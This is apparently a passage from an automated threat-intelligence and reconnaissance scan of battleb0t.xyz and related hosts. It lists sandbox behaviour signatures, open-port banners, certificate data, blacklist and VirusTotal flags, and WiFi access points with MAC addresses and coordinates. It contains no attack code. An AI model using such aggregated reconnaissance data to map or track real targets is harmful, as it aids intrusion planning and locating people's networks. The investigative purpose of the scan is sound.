"c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006768]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006768]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006768]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006768]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006768]\n "Tabs_13327998438932197" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13327998438932197]- [targetUID: 00000000-00006768]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006768]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "5d847ab1-2881-4324-a2c6-29fe1a950926.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\5d847ab1-2881-4324-a2c6-29fe1a950926.tmp]- [targetUID: 00000000-00006768]\n "88a6edb1-7ca5-423a-948d-baf040324d05.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\88a6edb1-7ca5-423a-948d-baf040324d05.tmp]- [targetUID: 00000000-00006768]\n "a969316a-dad8-4b0d-bf02-210809eb9653.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\a969316a-dad8-4b0d-bf02-210809eb9653.tmp]- [targetUID: 00000000-00006768]\n "6086c4de-4b79-4b17-a9f3-0d813216df1c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6086c4de-4b79-4b17-a9f3-0d813216df1c.tmp]- [targetUID: 00000000-00006768]\n "be503e2a-334b-416d-8133-7309c5f020e8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\be503e2a-334b-416d-8133-7309c5f020e8.tmp]- [targetUID: 00000000-00006768]\n "3da34e63-27c2-46cb-9277-75fa8ed92f1a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\3da34e63-27c2-46cb-9277-75fa8ed92f1a.tmp]- [targetUID: 00000000-00006768]\n "ba18673a-06ca-42f2-836f-2b95dafc094e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ba18673a-06ca-42f2-836f-2b95dafc094e.tmp]- [targetUID: 00000000-00006768]\n "8a917af9-8d36-4842-b176-78503ca8e5cb.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8a917af9-8d36-4842-b176-78503ca8e5cb.tmp]- [targetUID: 00000000-00006768]\n "Network Action Predictor" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network Action Predictor]- [targetUID: 00000000-00006768]\n "Cookies" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies]- [targetUID: 00000000-00005860]\n "Network Action Predictor-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network Action Predictor-journal]- [targetUID: 00000000-00006768]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\000003.log]- [targetUID: 00000000-00006768]\n "222527e1-3f73-4acc-a332-f69002db3178.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\222527e1-3f73-4acc-a332-f69002db3178.tmp]- [targetUID: 00000000-00006768]\n "f838898f-efdb-43ba-a200-ee2debfcb004.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\f838898f-efdb-43ba-a200-ee2debfcb004.tmp]- [targetUID: 00000000-00006768]\n "9fa1a642-dc59-4b5c-b3dc-8b2fdacab608.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\9fa1a642-dc59-4b5c-b3dc-8b2fdacab608.tmp]- [targetUID: 00000000-00006768]\n "7f4cd2f4-322e-419e-b872-153c4df2b660.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\7f4cd2f4-322e-419e-b872-153c4df2b660.tmp]- [targetUID: 00000000-00006768]\n "4add7271-5d67-4bc9-8ac7-d5d5845e9be7.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4add7271-5d67-4bc9-8ac7-d5d5845e9be7.tmp]- [targetUID: 00000000-00006768]\n "Cookies-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies-journal]- [targetUID: 00000000-00005860]\n "History-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History-journal]- [targetUID: 00000000-00006768]\n "urlref_httpshassan-gamall.github.ionetflix" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00006768]\n "000004.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Session Storage\\000004.log]- [targetUID: 00000000-00006768]\n "0a0f3415-fbdd-4dcb-895f-bbcb036930f4.tmp" has type "ASCII text with very long lines with no line terminators"- L | 185.199.108.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | tc (Net ID: 00:12:BF:FD:D7:70) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:74:7A:73) | 50.1188, 8.6843 |
| 2023-05-12 02:52:45 | Malicious IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [35.229.48.116]
https://www.virustotal.com/en/ip-address/35.229.48.116/information/ | 35.229.48.116 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | YILBEKKIMYA (Net ID: 00:02:CF:C6:17:D5) | 40.2024, 29.0398 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:26:98:C5) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.240): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | kids (Net ID: 00:0C:41:FC:94:E2) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:01:36:41:8C:04) | 50.1188, 8.6843 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5e6685bb0686ab-ORD
| 188.114.96.1 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.96): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 001viet.com | 185.199.111.153 |
| 2023-05-12 02:44:35 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:cd:b7:3c:d6:71:f3:4f:d0:0b:1c:3a:89:f9:32:41:9b:99
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:22:44 2022 GMT
Not After : Feb 15 13:22:43 2023 GMT
Subject: CN=www.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:bd:87:9d:fd:0d:e7:91:1c:82:de:38:55:01:b8:
01:a4:4f:91:68:f2:b6:41:bd:96:b7:21:f2:a0:55:
3b:8f:fb:94:98:1c:4d:61:0a:0d:49:1e:41:02:01:
75:0f:0f:e7:3e:9d:a4:2e:1d:07:1e:23:ae:57:ed:
a8:d0:66:39:2d:83:68:be:6e:6f:58:41:0a:9a:c5:
3e:12:87:89:8c:60:e5:de:67:7a:e4:46:2e:7b:08:
ed:c2:60:17:80:e6:b4:45:ca:55:4c:b4:aa:5a:0e:
21:b2:65:97:04:7d:42:9a:78:70:55:51:b1:3b:c5:
d3:0d:ce:41:3b:0f:13:16:72:ef:e1:6f:39:c8:fd:
4b:2d:7e:9e:b0:41:fd:9c:7c:61:84:dd:e4:70:a7:
c5:c7:ec:ba:20:9f:a0:1f:9c:1c:14:59:c8:6c:6b:
82:ec:5e:ff:5a:3a:74:2a:f6:b9:fb:b1:ab:97:21:
90:d8:cd:5c:36:36:0e:73:80:7f:e4:4a:7c:cd:5d:
9a:1e:e6:d5:29:40:7a:8c:74:6b:33:02:0d:4e:19:
f0:00:4b:c5:69:8a:06:03:20:76:15:a8:c2:2f:17:
7a:d2:cd:b7:58:14:91:a2:f2:64:cf:8f:82:14:81:
ba:d6:41:8b:94:86:36:f5:f5:da:76:a8:04:5b:ad:
f0:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
57:48:2A:D8:70:70:AC:E4:0A:F6:8C:02:EF:80:5A:28:2D:B1:3C:AE
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 14:22:44.733 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:7D:43:FE:B2:8F:39:1E:47:D3:4E:E0:E7:
C1:B1:8B:57:06:D2:76:ED:81:DE:13:92:4B:59:E1:0D:
E1:54:A6:2E:02:20:27:F3:A5:E3:4D:A0:5B:74:9C:AE:
24:19:49:4F:5A:4D:03:EC:31:45:B7:6C:88:42:8E:2E:
D2:BE:8C:FB:57:B0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 14:22:44.759 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:67:2A:3E:AE:5B:FA:9D:21:E6:78:C9:B5:
32:84:F5:3A:5F:3D:2C:3F:95:0F:DC:A5:59:86:0D:C8:
0B:41:11:D2:02:20:63:16:72:2A:95:56:D8:41:75:BA:
49:9E:23:2F:53:25:77:A6:63:94:8C:F3:B6:53:AF:2A:
A8:59:D1:A9:9C:CD
Signature Algorithm: sha256WithRSAEncryption
69:f6:10:de:4a:59:85:12:cb:0c:73:ae:07:34:65:83:35:84:
f1:e5:d1:1e:aa:81:f0:fa:c1:7d:ee:43:55:61:61:1e:9a:45:
59:44:67:b5:db:f6:4c:78:25:c7:53:7c:97:8b:4a:fb:11:dc:
e0:51:d3:53:45:91:34:32:cb:90:47:86:dc:ed:a1:bd:fc:40:
e0:a4:14:29:bc:25:da:55:40:59:c3:ef:db:fe:30:93:c5:20:
36:cc:8b:d7:fc:4b:50:d2:9b:3f:37:90:2f:31:18:82:e6:3f:
62:9d:55:68:5f:c7:cc:a4:c8:0d:5f:fd:5c:04:b8:f7:81:3f:
f8:b5:3b:7a:5a:ce:e7:04:7f:b8:8e:e7:e7:b8:de:fe:45:18:
97:a0:82:7c:ec:ee:27:75:85:c8:99:88:62:de:9e:d4:17:24:
92:d4:62:f4:bf:04:0c:53:8e:c9:0d:cf:b1:fe:cf:33:b8:c3:
de:c2:59:25:4d:da:c4:cc:15:c1:19:62:b5:0e:04:65:79:3e:
2f:e1:2d:3a:0e:b5:1f:59:5f:24:31:fb:44:b9:a9:7b:5b:d0:
1a:d5:2d:c5:8a:f4:b5:d2:15:a9:55:4e:d6:8d:41:10:d0:3d:
11:3d:f3:ae:e5:6d:45:ec:47:8d:7f:36:ac:00:31:76:64:4a:
f9:2f:a2:25
| battleb0t.xyz |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.140): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Brandis Wifi 2GHz (Net ID: 00:01:9F:20:CA:50) | 34.0544, -118.244 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2087 | 104.21.6.166 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MainSurf (Net ID: 00:02:2D:8B:15:E0) | 50.1188, 8.6843 |
| 2023-05-12 02:55:21 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 207.154.228.169 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CFS (Net ID: 00:18:39:0C:15:86) | 32.8608, -79.9746 |
| 2023-05-12 02:49:32 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://app-mobile-link.ml', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url1021.joinpreventor.com/ls/click?upn=bna4-2BmY1ITDZjl0PQKir67uPPI2f2DxWOATqx3-2Fj7OYylB8Hflza-2F4c-2BTJ51THm64bMitYJMpTuBxoVK0JwiPA-3D-3DJ9Mp_mSllOFscLbgTD69Yd5M4iZvJ2paH7zkSD0m2J2dAKbXAH-2BqpVRSKcCjXP2k6p2y4nrVy7lmBrfgOzMBh71z-2FxzpQdOSEWu-2BZu6bLzGdNpAef0msgWTQ8GjPF3HDwIREahUwNjJmuPNPOCq8kmJFsGkQuKDPvi3VJ-2BwWOm3SROtMgrYyhDlnRSELMQK13gLTLKNNOp2u9AW5EZxz6MgcQRFVPz8yG-2BrL1av-2FleG35b4hBziNJLJOnOKWJG9RES5MX1Ek-2FPBzBGpdQpeubFqiI89NGHHrQdpAH4cQB4XK6aVSi4cb7kNExF6e-2FQvzWvrpfLOIXmI4-2FGMnpeFCmay0PMKN53-2FQ6jYyBtH8aR8JFs8BhbQdGQP9tDru83lOXy-2FNdatgyeZMIx-2BvI781sKgkBr3eSPJn-2BFZFLkDDqZl5OwlE5BiL0L-2FeFx9NYfYRUjJog', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e68_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_e68_ConnHashTable<3688>_HashTable_Mutex"\n "IsoScope_e68_IESQMMUTEX_0_519"\n "IsoScope_e68_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e68_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3688"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_e68_IE_EarlyTabStart_0xa10_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3688"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.120:80"\n "52.25.204.60:443"\n "209.197.3.8:80"\n "142.250.188.10:443"\n "18.155.202.116:443"\n "172.217.12.104:443"\n "54.161.241.46:443"\n "185.199.110.153:443"\n "108.138.245.108:443"\n "142.250.191.74:443"\n "172.217.164.99:443"\n "108.139.1.40:443"\n "157.240.22.25:443"\n "136.143.191.67:443"\n "142.251.46.238:443"\n "18.155.202.12:443"\n "91.199.212.52:80"\n "204.141.43.48:443"\n "136.143.191.144:443"\n "136.143.190.97:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url1021.joinpreventor.com"\n "crt.usertrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"crt.usertrust.com"\n "maciejsawicki.com"\n "preventor.com"\n "salesiq.zoho.com"\n "salesiq.zohopublic.com"\n "url1021.joinpreventor.com"\n "vts.zohopublic.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF3EF.tmp" as clean (type is "data")'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00003216"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5fb4d2b5847afb666a7db5b8_nav-kyb_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fe14b9e5dab5b2dea0a2754_nav-onboarding_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fc94f098f011ed08c55c1c6_nav-travel_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d399b50c403dd6ef8a71_icon_solutions_1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8ffce80d3d6_decor-rows_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fffc8d255c2700249c77f91_icon-arrow-rigth-wh_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e333be007ebd657a9e2_Powerfull-notice_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c611b6f7021b7a90b6_nav-healthcare_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8720a80d3d7_decor-dots_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e3603c269bbe2a4fd83_Powerfull-transactions_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "625514f697cb9539930c08dc_arrow_lists_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2ad16e1b572e8f24659_nav-compliance_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d39997f0b639e8d1db34_icon_solutions_4_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff5c5146d1b1ad22260e36b_seamless-integration_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb58c9b980b499eebc9666f_nav-fraud-veritifcation_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fc94f03728d607c48960ad7_nav-educational_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c73c18f306a879a966_nav-law_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fc94f03a68318a6830bfa8d_nav-ecommerce_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6307aad46dbfb3ff5914cc43_arrow_direction_right_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b4e74d60fd6b7c05e3_nav-kyc_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-167', u'name': u'Contains ability to retrieve the contents of the STARTUPINFO structure (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"GetStartupInfo" [Source: 00000000-00003216.00000000.66665.00C41000.00000020.mdmp\n 00000000-00003216.00000000.66676.00C41000.00000020.mdmp]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"GET /5f774172772fc1fb1fa10c12/5f774173a2f6f80a3d80d3be_twitter.png HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "twitter")\n "GET /5f774172772fc1fb1fa10c12/606cb3a9126777b98ff68805_icon-youtube.png HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-20', u'name': u'HTTP request contains Base64 encoded artifacts', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1132/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1132.001', u'relevance': 7, u'threat_level': 0, u'type': 7, u'description': u'"n"\n "v"\n "f"\n "9"\n "t"\n "="\n "<"\n "6"\n "`"\n "X"\n ">"\n "c"\n ")"\n "A"\n "w"\n "L"\n "u"\n "L"\n "y"\n """, "L", ";", "J", """\n "<"\n "2"\n "}"\n "2"\n "S"\n "0"\n "y"\n "3"\n "h"\n "~"\n " "\n "b"\n "v"\n "t"\n "\\"\n "U"\n "E"\n """, "5", "N", ".", "\'", "\\", "`", "k", "~", "0", "{", "=", ":", "P", "t", "Z", "f", "/", "1", "6", "I", "d", "h", "q", "D", "j", "0", "6", "2", "f", "O", "8", "*", "b", "E", "i", "-", "\'", "`", "p", "X", "I", "2", "\n", "x", "L", "4", "v", "F", "q", " ", "q", "E", "T", "m", "Z", "a", "e", "x", "m", "o", "A", "#", "I", "\n", "8", "D", "K", "I", "6", "s", "j", "]", "B", "l", "Z", "#", "M", "q", "A", "@", "R", "C", "D", "^", "T", "/", "k", "!", "y", "a", "F", "2", "z", "^", ")", "C", "(", "w", "T", ":", "G", "E", "a", "m", "F", "@", " | 185.199.110.153 |
| 2023-05-12 02:54:20 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://funny.battleb0t.xyz/gallery.css |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.207): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
